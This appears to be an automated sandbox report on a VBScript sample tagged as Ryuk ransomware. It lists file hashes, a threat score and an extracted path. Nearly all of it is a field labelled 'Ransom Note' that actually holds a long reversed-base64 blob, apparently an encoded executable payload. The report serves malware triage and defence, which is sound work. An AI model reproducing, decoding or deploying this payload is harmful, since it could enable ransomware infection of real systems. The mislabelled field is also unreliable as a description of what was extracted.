ryuk | 7ccd80bd19a444e3344202bc28c864fba929d3fd97f4214bcd7ccd47b0bb0c96

General

Target

SiggiaW.vbs
Size

1KB
MD5

ac8c266035cf2993ef4dabcf3ee2b2b6
SHA1

a83110c8938103e85dc6517811a67e63646740d5
SHA256

7ccd80bd19a444e3344202bc28c864fba929d3fd97f4214bcd7ccd47b0bb0c96
SHA512

9c0cdc00af111ed96b8707d1490d90771f65cf98bef521d9a6e276ca7cff51e1d1449217d7228ff0edca3b4ac3939f69117bc3646c8bc5c50813d6f8c9b37954

Score

10^/10

ryuk ransomware upx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L1Y3K90W\base64[1].txt

Family

ryuk

Ransom Note

=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